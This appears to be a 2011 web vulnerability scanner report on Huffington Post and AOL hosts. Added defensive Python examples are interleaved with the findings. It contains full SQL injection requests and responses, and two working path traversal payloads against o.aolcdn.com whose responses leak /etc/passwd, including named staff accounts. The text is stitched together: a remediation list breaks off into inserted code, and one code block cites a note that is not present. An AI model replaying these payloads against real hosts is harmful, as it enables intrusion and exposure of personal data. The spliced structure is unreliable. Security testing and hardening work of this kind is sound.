Etag: "54018d3f1db7e92a658590f8fbfc22adc1e471c2"
Content-Length: 101
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Thu, 05 May 2011 01:33:55 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://techcrunch.com/2011/05/04/mashery-funding-2/%27%27", "diggs": 0});
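
Two small checks that follow from the remediation note above, written here as an added example (not code from this report, from Digg, or from the count widget): a function that works out how many URL-decodes lie between what was sent and what the application echoed (for the url value and the JSON echo shown above it finds exactly one), and the vulnerable decode-then-decode-again pattern beside the hardened decode-once, validate, then use version. The handler functions are hypothetical and stand in for whatever the real application does.

```python
from urllib.parse import unquote

# Constructed values modelled on the report's two requests: the url parameter
# with a double-encoded quote (%2527) and the value the JSON response echoed.
SENT_ONE_QUOTE = "http%3A//techcrunch.com/2011/05/04/mashery-funding-2/%2527"
SENT_TWO_QUOTES = SENT_ONE_QUOTE + "%2527"
ECHOED_TWO_QUOTES = "http://techcrunch.com/2011/05/04/mashery-funding-2/%27%27"


def decode_layers(sent, echoed, limit=5):
    """How many URL-decodes separate what was sent from what the application
    reflected back? Returns -1 if no count up to `limit` fits."""
    value = sent
    for n in range(limit + 1):
        if value == echoed:
            return n
        value = unquote(value)
    return -1


def web_server_decode(raw):
    """The web server decodes the query string exactly once."""
    return unquote(raw)


def has_sql_quote(value):
    return "'" in value


def handler_double_decode(raw):
    """Vulnerable pattern: a filter runs on the once-decoded value, then the
    application decodes again before use. %2527 passes the filter as the
    harmless text %27 and only becomes a quote at the sink."""
    once = web_server_decode(raw)
    if has_sql_quote(once):
        return "blocked", once
    at_sink = unquote(once)          # the second, unnecessary decode
    return "accepted", at_sink


def handler_validate_canonical(raw):
    """Hardened pattern: decode once, validate that result, and hand the very
    same string to the sink. No later step re-interprets it."""
    canonical = web_server_decode(raw)
    if has_sql_quote(canonical):
        return "blocked", canonical
    return "accepted", canonical


if __name__ == "__main__":
    print("decode layers seen by the echo:",
          decode_layers(SENT_TWO_QUOTES, ECHOED_TWO_QUOTES))
    print("double-decode handler  :", handler_double_decode(SENT_ONE_QUOTE))
    print("canonical-then-validate:", handler_validate_canonical(SENT_ONE_QUOTE))
```

The decode-layer count is the first thing to establish on a target like this: if a reflected copy of the value shows only one decode, a %2527 bypass can still exist at a different sink, but the echo itself is no evidence for it.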

1.12. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Both responses here are 200 pages of 268691 and 268645 bytes, and the only difference visible in the excerpts below is per-request noise: the ad tag's ord= cache-buster (47570434 against 78811701) and the Cache-Control max-age countdown (28 against 29). The injected text is moreover a parameter name rather than a value, which a home page would rarely pass to a query. Treat this as a false positive unless a diff of the complete bodies, with such volatile tokens removed, still shows a change that follows the injected condition.

Request 1

GET /?icid=navbar_huffpo_main5&1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=28
Date: Thu, 05 May 2011 01:16:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
HPAds.ads_client_info() + ';load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown|||' + HPAds.ads_u_value() + '||||' + HPAds.ads_inf_value() + ';sz=970x418;tile=1;ord=47570434?"></scr' + 'ipt>';
                       if(HuffCookies.getCookie('is_aol_user')=="1" && ad_code.match(/mid_article/gi))
                       {                            
                           var adSonarArray = {
                               'default':[1517286,2255770],
                               'entertainment':[1517280,2259767],
                               'politics':[1517131,2259768],
                               'business':[1517131,2259768],
                               'sports':[1517295,2259769],
                               'travel':[1517304,2259770]
                               }
                               document.write('<style type=\"text/css\">#ad_mid_article {float:left;width:300px;margin:10px 10px 10px 0} .mid_article_ad_label {display:none} #mid_article_deco {border:none;margin:0;padding:0}</style>');
                               if(adSonarArray[HPConfig.current_vertical_name]){
                                   HPAds.adSonar(adSonarArray[HPConfig.current_vertical_name][0],adSonarArray[HPConfig.current_vertical_name][1],300,250)
                               }
                               else{
                                   HPAds.adSonar(adSonarArray['default'][0],adSonarArray['default'][1],300,250)
                               }
                       }
    else if(!(HuffCookies.getCookie('is_aol_user')=="1" && (ad_code.match(/left_lower/gi) || ad_code.match(/pushdown/gi) || ad_code.match(/curtain/gi) )))
{
   document.write(supress_keyvalues(ks, ad_code));
}
var debugadcode = '';
document.write(debugadcode);
}
</script></div> <script type="text/javascript">
QV.place_quickread_ads = true;
</script>
   
<div class="main_big_news_ontop" id="topnav_big_news_module">


<div id="big_news_update">
<ul class="big_news_ontop">
<li ><a href="/big-news/#homepage" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');" class="title">BIG NEWS:</a></li>
<li><a href="/news/gingrich-2012" class="big_news_item first" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');">Gingrich 2012</a></li>
<li class='line'>|</li>
<li><a href="/news/elections-2012" class="big_news_item bn_v_politics" onclick="HPTrack.trackPageview('/t/a/top
...[SNIP]...

Request 2

GET /?icid=navbar_huffpo_main5&1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=29
Date: Thu, 05 May 2011 01:16:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
HPAds.ads_client_info() + ';load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown|||' + HPAds.ads_u_value() + '||||' + HPAds.ads_inf_value() + ';sz=970x418;tile=1;ord=78811701?"></scr' + 'ipt>';
                       if(HuffCookies.getCookie('is_aol_user')=="1" && ad_code.match(/mid_article/gi))
                       {                            
                           var adSonarArray = {
                               'default':[1517286,2255770],
                               'entertainment':[1517280,2259767],
                               'politics':[1517131,2259768],
                               'business':[1517131,2259768],
                               'sports':[1517295,2259769],
                               'travel':[1517304,2259770]
                               }
                               document.write('<style type=\"text/css\">#ad_mid_article {float:left;width:300px;margin:10px 10px 10px 0} .mid_article_ad_label {display:none} #mid_article_deco {border:none;margin:0;padding:0}</style>');
                               if(adSonarArray[HPConfig.current_vertical_name]){
                                   HPAds.adSonar(adSonarArray[HPConfig.current_vertical_name][0],adSonarArray[HPConfig.current_vertical_name][1],300,250)
                               }
                               else{
                                   HPAds.adSonar(adSonarArray['default'][0],adSonarArray['default'][1],300,250)
                               }
                       }
    else if(!(HuffCookies.getCookie('is_aol_user')=="1" && (ad_code.match(/left_lower/gi) || ad_code.match(/pushdown/gi) || ad_code.match(/curtain/gi) )))
{
   document.write(supress_keyvalues(ks, ad_code));
}
var debugadcode = '';
document.write(debugadcode);
}
</script></div> <script type="text/javascript">
QV.place_quickread_ads = true;
</script>
   
<div class="main_big_news_ontop" id="topnav_big_news_module">


<div id="big_news_update">
<ul class="big_news_ontop">
<li ><a href="/big-news/#homepage" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');" class="title">BIG NEWS:</a></li>
<li><a href="/news/gingrich-2012" class="big_news_item first" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');">Gingrich 2012</a></li>
<li class='line'>|</li>
<li><a href="/news/elections-2012" class="big_news_item bn_v_politics" onclick="HPTrack.trackPageview('/t/a/top
...[SNIP]...
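
An added example (not part of this report or of the scanner that produced it) of the manual confirmation the note above asks for: each condition is sent more than once, per-request noise such as the ord= ad cache-buster that differs between the two responses above is normalised away, and a pair is only called condition-dependent when repeats of the same condition agree and the two conditions still differ. The response excerpts are constructed to mirror this report's home-page pair (1.12) and the threeup.php pair (1.13); the list of volatile tokens is an assumption to be extended per target.

```python
import re

# Tokens that change on every request regardless of the injected condition.
# The ord= ad cache-buster is what differs between the two huffingtonpost.com
# responses above; the others are common sources of the same kind of noise.
VOLATILE = [
    (re.compile(r"ord=\d+"), "ord=N"),
    (re.compile(r"max-age=\d+"), "max-age=N"),
    (re.compile(r"^Date: .*$", re.M), "Date: X"),
]


def normalize(body):
    for pattern, replacement in VOLATILE:
        body = pattern.sub(replacement, body)
    return body


def classify(true_bodies, false_bodies):
    """Classify a boolean pair once each condition has been sent more than once.

    unstable            repeats of the same condition differ after
                        normalisation, so the page is too dynamic to diff
    no-difference       true and false conditions normalise to the same page;
                        the scanner's diff was only volatile noise
    condition-dependent the page tracks the injected condition consistently
                        and is worth confirming by hand
    """
    true_set = {normalize(b) for b in true_bodies}
    false_set = {normalize(b) for b in false_bodies}
    if len(true_set) != 1 or len(false_set) != 1:
        return "unstable"
    if true_set == false_set:
        return "no-difference"
    return "condition-dependent"


# Constructed excerpts modelled on the responses in this report.
HOMEPAGE_TRUE = [
    "Cache-Control: max-age=28\n...;tile=1;ord=47570434?\n<li>Gingrich 2012</li>",
    "Cache-Control: max-age=27\n...;tile=1;ord=90210021?\n<li>Gingrich 2012</li>",
]
HOMEPAGE_FALSE = [
    "Cache-Control: max-age=29\n...;tile=1;ord=78811701?\n<li>Gingrich 2012</li>",
    "Cache-Control: max-age=26\n...;tile=1;ord=31415926?\n<li>Gingrich 2012</li>",
]
THREEUP_TRUE = [
    "trackPageview('/t/a/threeup.v1/World') LIBYA TARGETS AID SHIP",
    "trackPageview('/t/a/threeup.v1/World') LIBYA TARGETS AID SHIP",
]
THREEUP_FALSE = [
    "trackPageview('/t/a/threeup.v2/World') entry_threeup_central",
    "trackPageview('/t/a/threeup.v2/World') entry_threeup_central",
]
ROTATING_TRUE = ["headline A", "headline B"]    # content rotates per request
ROTATING_FALSE = ["headline C", "headline D"]


def triage():
    """Run the three constructed pairs through the classifier."""
    return {
        "homepage": classify(HOMEPAGE_TRUE, HOMEPAGE_FALSE),
        "threeup": classify(THREEUP_TRUE, THREEUP_FALSE),
        "rotating": classify(ROTATING_TRUE, ROTATING_FALSE),
    }


if __name__ == "__main__":
    for name, verdict in triage().items():
        print(f"{name:10s} {verdict}")
```

A "condition-dependent" verdict is still only a lead: as the threeup.php note explains, the next step is a second pair whose constants cannot be confused with ordinary parameter values.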

1.13. http://www.huffingtonpost.com/threeup.php [v parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.huffingtonpost.com
Path:   /threeup.php

Issue detail

The v parameter appears to be vulnerable to SQL injection attacks. The payloads 83591090'%20or%201%3d1--%20 and 83591090'%20or%201%3d2--%20 were each appended to the parameter's original value (v=1), so the requests below carry v=183591090'... . These two requests resulted in different responses, indicating that the input may be incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Unlike issue 1.12, the two responses here differ structurally rather than in random tokens: the "true" request gets the threeup.v1 layout with three full entries (7160 bytes), the "false" request the threeup.v2 layout with a central module (6018 bytes). That is the kind of condition-dependent change an injectable lookup produces, but the only visible difference between the two payloads is the digits 1 and 2, and an application that picks a layout by parsing the v value in some other way could produce the same result. Confirm with plain v=1 and v=2 baselines and with a pair whose constants cannot be read as layout numbers, for example ' or 3=3-- against ' or 3=4-- , each sent more than once.

Request 1

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=183591090'%20or%201%3d1--%20&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:30:40 GMT
Connection: close
Content-Length: 7160

       <div id="857693" class="grid third flush_top threeup_entries">
           <div id="entry_857693" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273918/thumbs/r-LIBYA-INTERNATIONAL-AID-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">LIBYA TARGETS AID SHIP</a></h5>
           </div>
       </div>        <div id="857719" class="grid third flush_top threeup_entries">
           <div id="entry_857719" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273951/thumbs/r-OSAMA-BIN-LADEN-PHOTOS-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">GRAPHIC: Photos Show 3 Dead Men At Bin Laden Compound</a></h5>
           </div>
       </div>        <div id="857555" class="grid third flush_top threeup_entries">
           <div id="entry_857555" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/afghanistan-pakistan-bin-laden_n_857555.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273798/thumbs/r-AFGHANISTAN-PAKISTAN-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/afghan
...[SNIP]...

Request 2

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=183591090'%20or%201%3d2--%20&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:30:40 GMT
Connection: close
Content-Length: 6018

       <div id="857597" class="grid third flush_top threeup_entries">
           <div id="entry_857597" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">            <img src="http://i.huffpost.com/gen/273847/thumbs/r-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html?ir=World" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">CNN Poll Finds That Most People Think Bin Laden Is In Hell</a></h5>
           </div>
       </div>        <div id="entry_threeup_central" class="grid third flush_top threeup_entries">
           <div id="entry_threeup_central_inner" class="entry no_border world">
               <div class="image_wrapper">                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273918/thumbs/s-LIBYA-INTERNATIONAL-AID-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273951/thumbs/s-OSAMA-BIN-LADEN-PHOTOS-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                    <a href="/world/" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');"><img src="http://i.huffpost.com/gen/273798/thumbs/s-AFGHANISTAN-PAKISTAN-BIN-LADEN-97x75.jpg" border=0 width=97 height=75 style="display:inline" /></a>                </div>
               <h5><a href="/world/" target="_top">More In World:</a> <a href="/world/" target="_top" class="threeup_titles" onclick="HPTrack.trackPageview('/t/a/threeup.v2/World');">                    Libya Targets Aid Arrival...                    Bin Laden Raid Photos...                    Pakistan Had To Know?...                    </a>
               </h5>
           </div>
       </div>        <div id="857624" clas
...[SNIP]...

2. File path traversal
There are 2 instances of this issue:

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, or by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:
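The canonicalise-then-check approach applied to a merge endpoint that accepts several f= values, in the style of /art/merge, written as an added example for this report (it is not code from the affected site, from AOLserver or from the scanner). BASE_DIR, ALLOWED_EXT and the function names are assumptions; the traversal string is the exact payload from finding 2.1. The vulnerable variant is included to show why that payload works at all: the traversal starts directly after ".css" with no separator, so a bogus component such as "radio-legacy-music2.css.." is being popped by string normalisation, something a real filesystem lookup would refuse.

```python
import os
import posixpath

# Hypothetical document root for the merge endpoint; the report does not reveal the real one.
BASE_DIR = "/srv/cdn/art"
# Only the asset types the endpoint is meant to merge.
ALLOWED_EXT = {".css", ".js"}
# Payload exactly as submitted in the f parameter in finding 2.1.
TRAVERSAL = "/_media/ch_music2/radio-legacy-music2.css../../../../../../../../etc/passwd"


def vulnerable_resolve(base, f):
    """The flawed pattern the report implies: prefix + user string, normalised
    as text. '..' is collapsed lexically, so even a non-existent component such
    as 'radio-legacy-music2.css..' is popped and the path walks out of the base
    directory. A kernel lookup would fail on that component, so the fact that
    /etc/passwd came back suggests the application normalised the string first."""
    return posixpath.normpath(base + "/" + f)


def safe_resolve(base, f):
    """Canonicalise with the filesystem API, require the result to stay under
    the canonical base, then apply an extension allowlist."""
    if "\x00" in f:
        raise ValueError("NUL byte in filename")
    base_real = os.path.realpath(base)
    # lstrip('/') stops os.path.join from discarding the base on absolute input.
    candidate = os.path.realpath(os.path.join(base_real, f.lstrip("/")))
    # commonpath is a component-wise test; a plain startswith() would accept
    # '/srv/cdn/art-private/...' as being inside '/srv/cdn/art'.
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise ValueError(f"path escapes {base_real}: {f!r}")
    if posixpath.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        raise ValueError(f"disallowed file type: {f!r}")
    return candidate


def is_allowed(base, f):
    """Boolean wrapper around safe_resolve for policy checks and tests."""
    try:
        safe_resolve(base, f)
        return True
    except ValueError:
        return False


def resolve_merge(base, f_values):
    """Resolve every f= value of a merge request or reject the whole request.
    Returns the canonical paths in request order."""
    return [safe_resolve(base, f) for f in f_values]


if __name__ == "__main__":
    print(vulnerable_resolve(BASE_DIR, TRAVERSAL))
    try:
        resolve_merge(BASE_DIR, ["/_media/ch_music2/radio-legacy-promobar.css", TRAVERSAL])
    except ValueError as e:
        print("rejected:", e)
```

realpath also follows symlinks, so on a live filesystem the check catches a link inside the web root that points outside it, which a purely lexical normpath check would miss.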



2.1. http://o.aolcdn.com/art/merge [f parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://o.aolcdn.com
Path:   /art/merge

Issue detail

The f parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload /_media/ch_music2/radio-legacy-music2.css../../../../../../../../etc/passwd was submitted in the f parameter. The requested file was returned in the application's response. Note that the response below carries Cache-Control: max-age=31536000 and an Expires header one year out, so a traversal response is cacheable by the CDN and by intermediaries for up to a year, and the leaked file is served with Content-Type: text/css.

Request

GET /art/merge?f=/_media/ch_music2/radio-legacy-music2.css../../../../../../../../etc/passwd&f=/_media/ch_music2/radio-legacy-muscnwssponslnk2.css&f=/_media/ch_music2/radio-legacy-promobar.css&f=/_media/ch_music2/radio-legacy-feeds_subscribe_en_us.css&f=/_media/music_en_us_css/aol.music.header.css&f=/_media/music_en_us_css/aol.music.footer.css&expsec=31536000&ver=40 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/css; charset=iso8859-1
Vary: Accept-Encoding
Cache-Control: max-age=31536000
Expires: Fri, 04 May 2012 13:03:58 GMT
Date: Thu, 05 May 2011 13:03:58 GMT
Connection: close
Content-Length: 26142

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin
...[SNIP]...
domo:x:91:91:majordomo mailing list:/usr/lib/majordomo:/bin/bash
quagga:x:92:92:quagga:/:/bin/false
dovecot:x:97:97:quagga:/usr/libexec/dovecot:/bin/false
gkrellmd:x:101:101:gkrellmd user:/:/bin/false
nobody:x:99:99:Nobody:/:/bin/false
altadmin:x:5996:1026:Local Technogy:/home/altadmin:/bin/ksh
ashishbh:x:9480:1026:Ashish Bhatt:/home/ashishbh:/bin/ksh
astevens:x:6694:1026:Andrew Stevens:/home/astevens:/bin
...[SNIP]...

2.2. http://o.aolcdn.com/art/merge/ [f parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://o.aolcdn.com
Path:   /art/merge/

Issue detail

The f parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload /mobileportal/s2c_modal.js../../../../../../../../etc/passwd was submitted in the f parameter. The requested file was returned in the application's response. The account list returned here differs from the one in 2.1 (for example dbus, vcsa and haldaemon appear here but not there), so the two requests were answered by different back-end hosts behind o.aolcdn.com, and the flaw is in the shared merge code rather than one misconfigured server.

Request

GET /art/merge/?f=/mobileportal/s2c_modal.js../../../../../../../../etc/passwd&f=/mobileportal/mobile_s2c_init.js&f=/feedback/feedback1.js&f=/mobileportal/mobileblog_profile.js&xpsec=31536000&ver=1y HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/?icid=prodserv_mobile_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Fri, 06 May 2011 01:12:53 GMT
Date: Thu, 05 May 2011 01:12:53 GMT
Connection: close
Content-Length: 20992

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/bin/false
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL da
...[SNIP]...

3. LDAP injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

